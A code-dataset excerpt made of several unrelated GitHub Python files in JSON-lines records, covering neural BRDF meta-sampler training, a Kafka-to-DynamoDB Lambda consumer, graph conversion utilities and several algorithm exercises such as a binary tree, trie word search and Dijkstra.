groundTruth_adapt = sampler.sample_on_merl(\n task_train, splr, shots\n )\n valid_idx = torch.any(groundTruth_adapt != 0.0, dim=1)\n n_valid = valid_idx.sum() # the number of valid samples\n if n_valid != shots:\n invalid_samples.append(rangles_adapt[~valid_idx, :])\n # skip this step if there are not valid samples\n if n_valid == 0:\n continue\n rangles_adapt, mlp_input_adapt, groundTruth_adapt = (\n rangles_adapt[valid_idx, :],\n mlp_input_adapt[valid_idx, :],\n groundTruth_adapt[valid_idx, :],\n )\n output = learner(mlp_input_adapt)\n rgb_pred = nbrdf.brdf_to_rgb(rangles_adapt, output)\n rgb_gt = nbrdf.brdf_to_rgb(rangles_adapt, groundTruth_adapt)\n train_loss = loss_fn(y_true=rgb_gt, y_pred=rgb_pred)\n learner.adapt(train_loss)\n\n # compute eval_loss for valid samples\n rangles_eval, mlp_input_eval, groundTruth_eval = task_test.next()\n output = learner(mlp_input_eval)\n rgb_pred = nbrdf.brdf_to_rgb(rangles_eval, output)\n rgb_gt = nbrdf.brdf_to_rgb(rangles_eval, groundTruth_eval)\n eval_loss = loss_fn(y_true=rgb_gt, y_pred=rgb_pred)\n\n # compute rejection loss for invalid samples\n if len(invalid_samples) != 0:\n invalid_samples = torch.vstack(invalid_samples)\n loss_w = 1e-2 # to balance 2 loss values\n rejection_loss = (\n loss_w\n * 0.5\n * (invalid_samples[:, 0] ** 2 + invalid_samples[:, 1] ** 2).sum()\n )\n else:\n rejection_loss = 0.0\n\n return eval_loss, rejection_loss\n\n\ndef evaluate(loader, model_GBML, splr, shots, k, loss_fn):\n freeze(splr)\n freeze(model_GBML, \"lrs\")\n\n meta_val_loss = 0.0\n meta_val_rej_loss = 0.0\n for tasks in loader:\n for _, task in enumerate(zip(*tasks)):\n learner = model_GBML.clone()\n\n eval_loss, rejection_loss = fast_adapt(\n learner, task, splr, shots, k, loss_fn\n )\n meta_val_loss += eval_loss.item()\n meta_val_rej_loss += (\n rejection_loss\n if isinstance(rejection_loss, float)\n else rejection_loss.item()\n )\n meta_val_loss /= len(loader.dataset)\n meta_val_rej_loss /= len(loader.dataset)\n\n unfreeze(splr)\n unfreeze(model_GBML, \"lrs\")\n\n return meta_val_loss, meta_val_rej_loss\n\n\ndef main(config):\n # general setup\n # ----------\n\n # FOR DEBUG\n # torch.autograd.set_detect_anomaly(True)\n\n # torch config & set random seed\n utils.seed_all(42)\n device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n torch.set_default_dtype(torch.float32)\n\n # hyperparameters\n shots = config.shots\n k = config.k\n n_det = config.n_det\n if n_det == -1:\n n_det = k * shots\n sampler_lr = config.sampler_lr\n fast_lr = config.fast_lr\n meta_bs = config.meta_bs\n n_epochs = config.n_epochs\n n_display_ep = config.n_disp_ep\n\n # config path\n exp_path = config.exp_path\n data_path = config.data_path\n model_path = config.model_path\n sampler_path = config.sampler_path\n\n # prepare datasets\n train_brdfs, test_brdfs = split_merl(data_path, split=0.8)\n # print(f\"datasets: {len(train_brdfs)} for training and {len(test_brdfs)} for testing\")\n\n taskset_train = datasets.MerlTaskset(train_brdfs, n_test_samples=25000)\n taskset_test = datasets.MerlTaskset(test_brdfs, n_test_samples=25000)\n\n taskloader_train = DataLoader(\n taskset_train, meta_bs, shuffle=True, collate_fn=datasets.custom_collate\n )\n\n taskloader_test = DataLoader(\n taskset_test, len(test_brdfs), collate_fn=datasets.custom_collate\n )\n\n # training setting\n # ----------\n if config.model == \"nbrdf\":\n model = nbrdf.MLP\n loss_fn = nbrdf.mean_absolute_logarithmic_error\n elif config.model == \"phong\":\n model = nbrdf.phong\n loss_fn = nbrdf.mean_absolute_logarithmic_error\n elif config.model == \"cooktorrance\":\n model = nbrdf.cook_torrance\n loss_fn = nbrdf.mean_absolute_logarithmic_error\n else:\n raise NotImplementedError(f\"{config.model} have not been implemented!\")\n\n model_GBML = l2l.algorithms.MetaSGD(model=model(), lr=fast_lr).to(device)\n\n # load the pretrained meta model\n pretrained_model = torch.load(\n os.path.join(model_path, f\"pretrained_{config.model}_20x512_10000ep.pth\"),\n map_location=device,\n )\n model_GBML.load_state_dict(pretrained_model)\n\n # prepare sampler\n splr = sampler.trainable_sampler_det(n_det, quasi_init=True).to(device)\n if n_det == 1:\n # 50 attempts to select the best initial positions\n best_attempt_loss = float(\"inf\")\n for _ in range(50):\n tmp_splr = sampler.trainable_sampler_det(n_det)\n tmp_splr.to(device)\n attempt_loss, _ = evaluate(\n taskloader_train, model_GBML, tmp_splr, shots, k, loss_fn\n )\n if attempt_loss < best_attempt_loss:\n best_attempt_loss = attempt_loss\n splr = tmp_splr\n else:\n trained_sampler_path = os.path.join(\n sampler_path, f\"meta_sampler_{config.model}_{n_det//2}.pth\"\n )\n if os.path.exists(trained_sampler_path):\n splr.load_samples(torch.load(trained_sampler_path, map_location=device))\n\n sampler_optimizer = optim.Adam(splr.parameters(), sampler_lr)\n sampler_scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(\n sampler_optimizer, T_max=500, eta_min=sampler_lr / 5\n )\n\n # misc variables\n val_loss = \"N/A\" # for logging\n\n losses = list()\n rej_losses = list()\n\n val_losses = list()\n val_rej_losses = list()\n\n # record the reference loss and the initial states\n meta_val_loss, meta_val_rej_loss = evaluate(\n taskloader_test, model_GBML, splr, shots, k, loss_fn\n )\n val_loss = f\"{meta_val_loss:.5f}\"\n val_losses.append(meta_val_loss)\n val_rej_losses.append(meta_val_rej_loss)\n\n # save in the beginning\n if config.save:\n _now = datetime.now()\n _format = \"%Y_%m_%d_%H_%M_%S\"\n workspace = _now.strftime(_format)\n ws_path = os.path.join(exp_path, workspace)\n os.makedirs(ws_path, exist_ok=True)\n\n yaml = YAML()\n with open(os.path.join(ws_path, \"config.yaml\"), \"w\") as f:\n yaml.dump(vars(config), f)\n\n def make_checkpoint(counter):\n ckpt = dict()\n ckpt[\"sampler\"] = copy.deepcopy(splr.state_dict())\n ckpt[\"sampler_optimizer\"] = copy.deepcopy(sampler_optimizer.state_dict())\n ckpt[\"sampler_scheduler\"] = copy.deepcopy(sampler_scheduler.state_dict())\n torch.save(ckpt, os.path.join(ws_path, f\"ckpt_{counter:04d}.pth\"))\n\n ckpt_counter = 0\n if config.save:\n make_checkpoint(ckpt_counter)\n ckpt_counter += 1\n\n # for recording the best\n best_loss = float(\"inf\")\n\n # main loop\n # ----------\n with tqdm(total=n_epochs) as t:\n for ep in range(n_epochs):\n # logging info\n logs = {}\n\n meta_train_loss = 0.0\n meta_train_rej_loss = 0.0\n for tasks in taskloader_train:\n sampler_optimizer.zero_grad()\n total_loss = 0.0\n for _, task in enumerate(zip(*tasks)):\n learner = model_GBML.clone()\n\n eval_loss, rejection_loss = fast_adapt(\n learner, task, splr, shots, k, loss_fn\n )\n total_loss += eval_loss + rejection_loss\n meta_train_loss += eval_loss.item()\n meta_train_rej_loss += (\n rejection_loss\n if isinstance(rejection_loss, float)\n else rejection_loss.item()\n )\n\n total_loss = total_loss / taskloader_train.batch_size\n total_loss.backward()\n\n sampler_optimizer.step()\n\n sampler_scheduler.step()\n\n # logging\n meta_train_loss = meta_train_loss / len(taskloader_train.dataset)\n meta_train_rej_loss = meta_train_rej_loss / len(taskloader_train.dataset)\n losses.append(meta_train_loss)\n rej_losses.append(meta_train_rej_loss)\n\n # record the best\n if meta_train_loss < best_loss:\n best_loss = meta_train_loss\n # save the best splr over training\n if config.save:\n torch.save(\n copy.deepcopy(splr.state_dict()),\n os.path.join(\n ws_path, f\"meta_sampler_{config.model}_{n_det}.pth\"\n ),\n )\n torch.save(\n copy.deepcopy(splr.state_dict()),\n os.path.join(\n sampler_path, f\"meta_sampler_{config.model}_{n_det}.pth\"\n ),\n )\n\n # validate\n if (ep + 1) % n_display_ep == 0:\n meta_val_loss, meta_val_rej_loss = evaluate(\n taskloader_test, model_GBML, splr, shots, k, loss_fn\n )\n\n # logging\n val_loss = f\"{meta_val_loss:.5f}\"\n val_losses.append(meta_val_loss)\n val_rej_losses.append(meta_val_rej_loss)\n\n # record intermediate states\n if config.save:\n make_checkpoint(ckpt_counter)\n ckpt_counter += 1\n\n logs[\"val_loss\"] = val_loss\n logs[\"train_loss\"] = f\"{meta_train_loss:.5f}\"\n logs[\"best_loss\"] = f\"{best_loss:.5f}\"\n t.set_postfix(logs)\n t.update()\n\n if config.save:\n plt.figure(figsize=(10, 5))\n plt.plot(losses)\n plt.savefig(os.path.join(ws_path, \"train_losses.pdf\"), bbox_inches=\"tight\")\n torch.save(losses, os.path.join(ws_path, \"train_losses.pth\"))\n\n plt.figure(figsize=(10, 5))\n plt.plot(rej_losses)\n plt.savefig(os.path.join(ws_path, \"train_rej_losses.pdf\"), bbox_inches=\"tight\")\n torch.save(rej_losses, os.path.join(ws_path, \"train_rej_losses.pth\"))\n\n plt.figure(figsize=(10, 5))\n plt.plot(val_losses)\n plt.savefig(os.path.join(ws_path, \"validate_losses.pdf\"), bbox_inches=\"tight\")\n torch.save(val_losses, os.path.join(ws_path, \"validate_losses.pth\"))\n\n plt.figure(figsize=(10, 5))\n plt.plot(val_rej_losses)\n plt.savefig(\n os.path.join(ws_path, \"validate_rej_losses.pdf\"), bbox_inches=\"tight\"\n )\n torch.save(val_rej_losses, os.path.join(ws_path, \"validate_rej_losses.pth\"))\n\n\nif __name__ == \"__main__\":\n # load command arguments\n # ----------\n\n parser = argparse.ArgumentParser(\n description=\"run meta-sampler experiment with specified configurations\"\n )\n parser.add_argument(\n \"--model\", type=str, default=\"nbrdf\", help=\"the name of model to be trained\"\n )\n parser.add_argument(\n \"--data_path\",\n type=str,\n default=\"/content/data/brdfs/\",\n help=\"the path containing brdf binaries\",\n )\n parser.add_argument(\n \"--model_path\",\n type=str,\n default=\"/content/data/meta-models/\",\n help=\"the path containing those pretrained meta models\",\n )\n parser.add_argument(\n \"--sampler_path\",\n type=str,\n default=\"/content/data/meta-samplers/\",\n help=\"the path containing those trained meta samplers\",\n )\n parser.add_argument(\n \"--shots\",\n type=int,\n default=1,\n help=\"the number of samples per step in the inner loop\",\n )\n parser.add_argument(\n \"--k\", type=int, default=1, help=\"the number of steps in the inner loop\"\n )\n parser.add_argument(\n \"--n_det\",\n type=int,\n default=-1,\n help=\"the number of trainable deterministic directions, deafulting to -1, which indicates k*shots\",\n )\n parser.add_argument(\n \"--meta_bs\", type=int, default=1, help=\"the batch size of outer loop\"\n )\n parser.add_argument(\n \"--fast_lr\", type=float, default=1e-3, help=\"the learning rate of inner loop\"\n )\n parser.add_argument(\n \"--sampler_lr\", type=float, default=1e-4, help=\"the learning rate of sampler\"\n )\n parser.add_argument(\n \"--n_epochs\", type=int, default=1000, help=\"the number of epochs\"\n )\n parser.add_argument(\n \"--n_disp_ep\",\n type=int,\n default=10,\n help=\"the number of epochs to validate the model\",\n )\n parser.add_argument(\n \"--save\",\n action=\"store_true\",\n help=\"if True, save the results into the workspace in the specified folder\",\n )\n parser.add_argument(\n \"--exp_path\",\n type=str,\n default=\"/content/drive/MyDrive/experiments/nbrdf-meta_sampler/\",\n help=\"the experiment folder\",\n )\n\n args = parser.parse_args()\n\n main(args)\n","repo_name":"ryushinn/meta-sampling","sub_path":"src/meta_sampler.py","file_name":"meta_sampler.py","file_ext":"py","file_size_in_byte":13699,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"16"} +{"seq_id":"4834088806","text":"import json\nimport base64\nfrom constants import *\nimport datetime\nimport boto3\nfrom kafka import KafkaConsumer\n\n\ndef append_transaction_details(data):\n \"\"\"\n append transaction details to dynamoDB\n \"\"\"\n dynamodb = boto3.resource('dynamodb', region_name='us-east-1')\n table = dynamodb.Table(DYNAMO_DB_NAME)\n print(\"data to append\", data)\n result = table.update_item(\n Key={'username': str(data['username'])},\n UpdateExpression=\"SET statements = list_append(if_not_exists(\"\n \"statements, :empty_list), :i)\",\n ExpressionAttributeValues={\n \":i\": [data],\n \":empty_list\": {\"statements\": []},\n },\n ReturnValues=\"UPDATED_NEW\"\n )\n\n\ndef lambda_handler(event, context):\n print(json.dumps(event))\n msgs = event['records'].values()\n for lst in msgs:\n for record in lst:\n print(record['value'], base64.b64decode(record['value']))\n information = json.loads(\n base64.standard_b64decode(record['value']).decode('utf-8'))\n append_transaction_details(information)\n print(\"finished\")\n # producer = KafkaProducer(bootstrap_servers=BOOTSTRAP_SERVERS)\n # print('publish approved transactions...')\n # for _ in range(10):\n # time = datetime.datetime.now().strftime('%m/%d/%Y %H:%M:%S')\n # producer.send(topic=\"Approved\", value=str.encode(time))\n # producer.flush()\n # print('finished')\n return {\n 'statusCode': 200,\n 'body': json.dumps('OK!')\n }\n\n\ndef main():\n consumer = KafkaConsumer(\n APPROVED_TOPIC_NAME,\n bootstrap_servers=BOOTSTRAP_SERVERS,\n group_id='status',\n auto_offset_reset='latest'\n )\n print('test consumer running')\n limit = 500 # consume at most 50 messages\n for idx, res in enumerate(consumer):\n if idx >= limit:\n break\n information = json.loads(res.value)\n print(information)\n append_transaction_details(information)\n consumer.commit()\n consumer.commit()\n\n\nif __name__ == '__main__':\n main()","repo_name":"linxiaow/AWS-MSK-Transaction-Fraud-Detection","sub_path":"kafka-final/test_consume_approve.py","file_name":"test_consume_approve.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"44035098440","text":"from dataclasses import dataclass\nfrom pathlib import Path\nfrom typing import List, Iterable\n\nfrom dependency_injector import containers\nfrom dependency_injector.wiring import inject\n\nfrom datagen.components.datapoint import DataPoint\n\nIDENTITIES_SCENE_FRAMES_RANGE = range(1)\n\n\n@inject\n@dataclass\nclass DatapointsRepository:\n datapoints_container: containers.DeclarativeContainer\n\n def get_datapoints(self, scene_path: Path, camera_name: str) -> List[DataPoint]:\n datapoints = []\n for frame_num in self._get_frames_range(scene_path):\n for environment in self._get_datapoints_environments(scene_path, camera_name, frame_num):\n datapoints.append(\n self.datapoints_container.factory(\n scene_path=scene_path,\n camera=camera_name,\n frame_num=frame_num,\n visible_spectrum_image_name=environment.image_name,\n )\n )\n return datapoints\n\n def _get_frames_range(self, scene_path: Path) -> range:\n if self._is_hic_scene(scene_path):\n return self._get_hic_scene_frames_range(scene_path)\n else:\n return IDENTITIES_SCENE_FRAMES_RANGE\n\n @staticmethod\n def _get_hic_scene_frames_range(scene_path: Path) -> range:\n frames_dirs = list(filter(lambda item: item.name.isnumeric(), scene_path.joinpath(\"frames\").iterdir()))\n frames_num = len(frames_dirs)\n return range(1, frames_num + 1)\n\n def _get_datapoints_environments(\n self, scene_path: Path, camera_name: str, frame_num: int\n ) -> Iterable[\"Environment\"]:\n return self.datapoints_container.modalities().read_textual_modality(\n modality_factory_name=\"environments\",\n modality_file_path=self._get_environments_modality_file_path(scene_path, camera_name, frame_num),\n )\n\n def _get_environments_modality_file_path(self, scene_path: Path, camera_name: str, frame_num: int) -> str:\n if self._is_hic_scene(scene_path):\n base_path = scene_path.joinpath(\"frames\", str(frame_num).zfill(3))\n else:\n base_path = scene_path\n return str(base_path.joinpath(camera_name, \"environment.json\"))\n\n @staticmethod\n def _is_hic_scene(scene_path: Path) -> bool:\n frames_path = scene_path.joinpath(\"frames\")\n return frames_path.exists() and frames_path.is_dir()\n","repo_name":"shayzi/datagen-sdk","sub_path":"components/datapoint/repo.py","file_name":"repo.py","file_ext":"py","file_size_in_byte":2450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"14188590616","text":"class Node:\n def __init__(self, data):\n self.data = data\n self.right = None\n self.left = None\n\n def insert(self, data):\n if self.data:\n if data < self.data:\n if self.left is None:\n self.left = Node(data)\n else:\n self.left.insert(data)\n else:\n if self.right is None:\n self.right = Node(data)\n else:\n self.right.insert(data)\n else:\n self.data = data\n\n # Tree Traversal\n\n # Inorder Transversal\n def inorderTransversal(self, root, transversed_node=[]):\n if root == None:\n return\n root.inorderTransversal(root.left)\n transversed_node.append(root.data)\n root.inorderTransversal(root.right)\n return transversed_node\n\n\n # PostOrder Transversal\n def postorderTransversal(self, root, transversed_node=[]):\n if root == None:\n return\n root.postorderTransversal(root.left)\n root.postorderTransversal(root.right)\n transversed_node.append(root.data)\n return transversed_node\n\n # PreOrder Transversal\n def preorderTransversal(self, root, transversed_node = []):\n if root == None:\n return\n\n transversed_node.append(root.data)\n root.preorderTransversal(root.left)\n root.preorderTransversal(root.right)\n return transversed_node\n\n\n\n\n\n\nroot = Node(40)\nroot.insert(30)\nroot.insert(25)\nroot.insert(35)\nroot.insert(50)\nprint(root.left.left.data)\n\nprint('###### --- InOrder')\nprint(root.inorderTransversal(root))\n\nprint('###### --- PreOrder')\nprint(root.preorderTransversal(root))\n\nprint('###### --- Post')\nprint(root.postorderTransversal(root))\n","repo_name":"SirDamis/Data-Structures-Algorithms","sub_path":"Implementation/Trees/BinaryTree.py","file_name":"BinaryTree.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"12482530835","text":"import networkx as nx\n\nimport pywhy_graphs\nimport pywhy_graphs.networkx as pywhy_nx\n\n\ndef graph_to_ananke(\n graph: pywhy_nx.MixedEdgeGraph,\n directed_edge_name=\"directed\",\n bidirected_edge_name=\"bidirected\",\n undirected_edge_name=\"undirected\",\n):\n \"\"\"\n Convert causal graph to Ananke graph. Supports graphs with directed, undirected, and\n bidirected edges -- including DAGs, ADMGs, and CGs (chain graphs).\n\n Parameters\n ----------\n graph : pywhy_nx.MixedEdgeGraph\n The mixed edge causal graph\n directed_edge_name : str\n Name of the directed edge, default is 'directed'.\n bidirected_edge_name : str\n Name of the bidirected edge, default is 'bidirected'.\n undirected_edge_name : str\n Name of the undirected edge, default is 'undirected'.\n Returns\n -------\n result : Graph\n The Ananke graph\n\n \"\"\"\n from ananke.graphs import ADMG, BG, CG, DAG, SG, UG\n\n vertices = graph.nodes\n has_directed = False\n has_bidirected = False\n has_undirected = False\n for edge_type, sub_graph in graph.get_graphs().items():\n if sub_graph.edges:\n if edge_type == directed_edge_name:\n has_directed = True\n di_edges = [e for e in sub_graph.edges]\n elif edge_type == bidirected_edge_name:\n has_bidirected = True\n bi_edges = [e for e in sub_graph.edges]\n elif edge_type == undirected_edge_name:\n has_undirected = True\n ud_edges = [e for e in sub_graph.edges]\n if has_directed and not has_bidirected and not has_undirected:\n result = DAG(vertices, di_edges)\n elif has_directed and has_bidirected and not has_undirected:\n result = ADMG(vertices, di_edges=di_edges, bi_edges=bi_edges)\n elif has_directed and not has_bidirected and has_undirected:\n result = CG(vertices, di_edges=di_edges, ud_edges=ud_edges)\n elif not has_directed and has_bidirected and not has_undirected:\n result = BG(vertices, bi_edges=bi_edges)\n elif not has_directed and not has_bidirected and has_undirected:\n result = UG(vertices, ud_edges=ud_edges)\n else:\n result = SG(vertices, di_edges=di_edges, bi_edges=bi_edges, ud_edges=ud_edges)\n\n return result\n\n\ndef ananke_to_graph(\n ananke_graph,\n directed_edge_name=\"directed\",\n bidirected_edge_name=\"bidirected\",\n undirected_edge_name=\"undirected\",\n) -> pywhy_nx.MixedEdgeGraph:\n \"\"\"\n Convert Ananke graph to causal graph. Explicitly supports conversion\n to pywhy_nx.DAG, pywhy_nx.ADMG, and for ananke.graphs.CG to pywhy_nx.CPDAG.\n Other graph types are converted to a pywhy_nx.MixedEdgeGraph.\n\n Parameters\n ----------\n ananke_graph : Graph\n The Ananke graph\n directed_edge_name : str\n Name of the directed edge, default is 'directed'.\n bidirected_edge_name : str\n Name of the bidirected edge, default is 'bidirected'.\n undirected_edge_name : str\n Name of the undirected edge, default is 'undirected'.\n Returns\n -------\n result : pywhy_nx.MixedEdgeGraph\n The mixed edge graph.\n \"\"\"\n from ananke.graphs import ADMG, CG, DAG\n\n if type(ananke_graph) == DAG:\n graph = pywhy_graphs.ADMG()\n graph.add_nodes_from(ananke_graph.vertices)\n graph.add_edges_from(ananke_graph.di_edges, edge_type=directed_edge_name)\n elif type(ananke_graph) == ADMG:\n graph = pywhy_graphs.ADMG()\n graph.add_nodes_from(ananke_graph.vertices)\n graph.add_edges_from(ananke_graph.di_edges, edge_type=directed_edge_name)\n graph.add_edges_from(ananke_graph.bi_edges, edge_type=bidirected_edge_name)\n elif type(ananke_graph) == CG:\n graph = pywhy_graphs.CPDAG()\n graph.add_nodes_from(ananke_graph.vertices)\n graph.add_edges_from(ananke_graph.di_edges, edge_type=directed_edge_name)\n graph.add_edges_from(ananke_graph.ud_edges, edge_type=undirected_edge_name)\n else:\n graph = pywhy_nx.MixedEdgeGraph()\n graph.add_nodes_from(ananke_graph.vertices)\n if ananke_graph.di_edges:\n directed_edges = nx.DiGraph(ananke_graph.di_edges)\n graph.add_edge_type(directed_edges, directed_edge_name)\n if ananke_graph.bi_edges:\n bidirected_edges = nx.Graph(ananke_graph.bi_edges)\n graph.add_edge_type(bidirected_edges, bidirected_edge_name)\n if ananke_graph.ud_edges:\n undirected_edges = nx.Graph(ananke_graph.ud_edges)\n graph.add_edge_type(undirected_edges, undirected_edge_name)\n\n return graph\n","repo_name":"py-why/pywhy-graphs","sub_path":"pywhy_graphs/export/ananke.py","file_name":"ananke.py","file_ext":"py","file_size_in_byte":4610,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"16"} +{"seq_id":"5571834762","text":"from typing import (\n List,\n)\n\nDIRECTION = [(0, 1), (0, -1), (1, 0), (-1, 0)]\n\n\nclass TrieNode:\n def __init__(self):\n self.children = {}\n self.is_word = False\n\n\nclass TrieTree:\n def __init__(self):\n self.root = TrieNode()\n\n def add(self, word):\n node = self.root\n\n for c in word:\n if c not in node.children:\n node.children[c] = TrieNode()\n\n node = node.children[c]\n node.is_word = True\n\n def find(self, word):\n node = self.root\n for c in word:\n node = node.children.get(c, None)\n if node is None:\n return None;\n\n return node\n\n\nclass Solution:\n\n def exist(self, board: List[List[str]], word: str) -> bool:\n\n tree = TrieTree()\n tree.add(word)\n\n n, m = len(board), len(board[0])\n\n for i in range(n):\n for j in range(m):\n c = board[i][j]\n if self.dfs(board, tree.root.children.get(c), i, j, set([(i, j)])):\n return True;\n\n return False;\n\n def dfs(self, board, node, x, y, visited):\n if node is None: return False;\n if node.is_word: return True;\n\n for dx, dy in DIRECTION:\n if not self.in_bound(board, x + dx, y + dy, visited): continue\n visited.add((x + dx, y + dy))\n if self.dfs(board, node.children.get(board[x + dx][y + dy]), x + dx, y + dy, visited):\n return True\n visited.remove((x + dx, y + dy))\n\n def in_bound(self, board, i, j, visited):\n if i < 0 or i > len(board) - 1: return False;\n if j < 0 or j > len(board[0]) - 1: return False;\n if (i, j) in visited: return False\n\n return True\n\n\nboard = [\"ABCE\", \"SFCS\", \"ADEE\"]\nword = \"ABCCED\"\nret = Solution().exist(board, word)\n","repo_name":"jzhao62/lintcode_manuscript","sub_path":"lintcode/123/draft1.py","file_name":"draft1.py","file_ext":"py","file_size_in_byte":1840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"35264347877","text":"import numpy as np\r\nfrom keras.models import Sequential, load_model\r\nimport pandas as pd\r\nfrom keras.utils import np_utils\r\nimport evaluate_method\r\n\r\ndef eval_model(model, test_data_x, test_y_1D):\r\n y_pred_test = model.predict(test_data_x)\r\n probability = [prob[1] for prob in y_pred_test]\r\n print(len(probability))\r\n evaluate_method.get_ROC(test_y_1D, probability, save_path='roc_rnn_test.txt')\r\n acc = evaluate_method.get_acc(test_y_1D, probability) # AUC value\r\n auc = evaluate_method.get_auc(test_y_1D, probability) # ACC value\r\n kappa = evaluate_method.get_kappa(test_y_1D, probability)\r\n IOA = evaluate_method.get_IOA(test_y_1D, probability)\r\n mcc = evaluate_method.get_mcc(test_y_1D,probability)\r\n recall = evaluate_method.get_recall(test_y_1D, probability)\r\n precision = evaluate_method.get_precision(test_y_1D, probability)\r\n f1 = evaluate_method.get_f1(test_y_1D, probability)\r\n print(\"ACC = \" + str(acc)+\" AUC = \" + str(auc)+ ' kappa = '+ str(kappa) +\r\n ' IOA = ' + str(IOA) + ' MCC = ' + str(mcc))\r\n print(\"precision = \" + str(precision)+\" recall = \" + str(recall)+ ' f1 = '+ str(f1))\r\n # print(\"AUC = \" + str(auc))\r\n # print(kappa)\r\n\r\ndef readData(filePath):\r\n #训练数据的读入\r\n data = pd.read_csv(filePath)\r\n data = data.values\r\n data_x = data[:,:-1]\r\n data_x = np.expand_dims(data_x, axis=2)\r\n data_y_1D = data[:,-1]\r\n data_y = np_utils.to_categorical(data_y_1D, 2)\r\n return data_x, data_y, data_y_1D\r\ntrain_x, train_y, train_y_1D = readData('train_data_yongxin.csv')\r\ntest_x, test_y, test_y_1D = readData('test_data_yongxin.csv')\r\n#\r\n# test_x = train_x\r\n# test_y_1D = train_y_1D\r\n\r\nmodel_cnn = load_model('my_model_yongxin1.h5')\r\n# model_rnn = load_model('my_model_RNN1.h5')\r\n# model_rnn = load_model('my_model_yanshan_rnn.h5')\r\n# model_rnn_aug = load_model('my_model_yanshan_rnn_aug.h5')\r\n# print(str(model_cnn))\r\n\r\n\r\n# 评估模型\r\n# eval_model(model_cnn, test_data_x, test_y_1D)\r\n# eval_model(model_cnn_aug, test_data_x, test_y_1D)\r\n# eval_model(model_rnn, test_data_x_rnn, test_y_1D)\r\neval_model(model_cnn, test_x, test_y_1D)","repo_name":"xmblb/CNN_FE","sub_path":"CNN_ouput.py","file_name":"CNN_ouput.py","file_ext":"py","file_size_in_byte":2136,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"16"} +{"seq_id":"74664688007","text":"\"\"\"\r\n\"\"\"\r\nfrom collections import Counter\r\n\r\n\r\ndef numJewelsInStones(J, S):\r\n \"\"\"\r\n \"\"\"\r\n counts = Counter(S)\r\n intersection = set(J) & set(counts.keys())\r\n return sum(counts[jewel] for jewel in intersection)\r\n\r\n\r\ndef alt(J, S):\r\n \"\"\"\r\n fastest\r\n \"\"\"\r\n counts = 0\r\n set_J = set(J)\r\n for stone in S:\r\n if stone in set_J:\r\n counts += 1\r\n return counts\r\n\r\n\r\ndef altalt(J, S):\r\n \"\"\"\r\n \"\"\"\r\n counts = Counter(S)\r\n total = 0\r\n for jewel in J:\r\n try:\r\n total += counts[jewel]\r\n except KeyError:\r\n continue\r\n\r\n return total\r\n","repo_name":"kurtrm/code-katas","sub_path":"src/jewels_and_stones.py","file_name":"jewels_and_stones.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"39781062316","text":"import sys\nimport heapq\ninf = float('inf')\ninput = sys.stdin.readline\n\nV, E = map(int, input().split())\ngraph = [[] for _ in range(V+1)]\nfor _ in range(E):\n u, v, w = map(int, input().split())\n graph[u].append((v, w)) # u->v\n graph[v].append((u, w)) # v->u\nv1, v2 = map(int, input().split())\ndistance = [[inf] * (V+1) for _ in range(3)] # 1, v1, v2\ndistance[0][1] = 0 # distance[0] : 1을 시작점으로 하는 최소거리\ndistance[1][v1] = 0 # distance[1] : v1을 시작점으로 하는 최소거리\ndistance[2][v2] = 0 # distance[2] : v2를 시작점으로 하는 최소거리\n\nfor i, S in enumerate([1, v1, v2]): # [(0,1), (1,v1), (2,v2)]\n heap = []\n heapq.heappush(heap,(0, S))\n while len(heap) > 0:\n weight, node = heapq.heappop(heap)\n if distance[i][node] >= weight:\n for v, w in graph[node]:\n if weight + w < distance[i][v]:\n distance[i][v] = weight + w\n heapq.heappush(heap, (weight+w, v))\n\nminimum = min(distance[0][v1] + distance[1][v2] + distance[2][V], distance[0][v2] + distance[2][v1] + distance[1][V])\n# distance[0][v1] 1->v1\n# distance[1][v2] v1->v2\n# distance[2][V] v2->V\n# distance[0][v2] 1->v2\n# distance[2][v1] v2->v1\n# distance[1][V] v1->V\nif minimum == inf:\n print(-1)\nelse:\n print(minimum)","repo_name":"cmh1027/bakjoon","sub_path":"최단경로/다익스트라/1504.py","file_name":"1504.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"25195688731","text":"from random import shuffle, choice\n\nlibrary = [\"champion\",\"international\", \"intelligence\", \"skyscrapper\"]\n\nword = choice(library)\nchars = list(word)\nlength = len(chars)\n\nshuffle(chars)\nfor i in range(length):\n print(chars[i], end=' ')\nprint()\nanswer = input(\"Your answer: \")\nif answer == word:\n print(\"Hura\")\nelse:\n print(\":(\")\n","repo_name":"tranduccuong90/C4E21","sub_path":"session3/ss3_excercise/ss3_hw3i.py","file_name":"ss3_hw3i.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"4785727895","text":"# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n#\n# ____ _\n# | __ ) _ _ __________ _ _ __ __| |\n# | _ \\| | | |_ /_ / _` | '__/ _` |\n# | |_) | |_| |/ / / / (_| | | | (_| |\n# |____/ \\__,_/___/___\\__,_|_| \\__,_|\n#\n#\n# Unit of Strength of Materials and Structural Analysis\n# University of Innsbruck,\n# 2021 - today\n#\n# Alexander Dummer alexander.dummer@uibk.ac.at\n#\n# This file is part of Buzzard.\n#\n# This library is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 2.1 of the License, or (at your option) any later version.\n#\n# The full text of the license can be found in the file LICENSE.md at\n# the top level directory of Buzzard.\n# ---------------------------------------------------------------------\n\nimport argparse\nimport os\n\nimport buzzard.core.optimizer\nimport 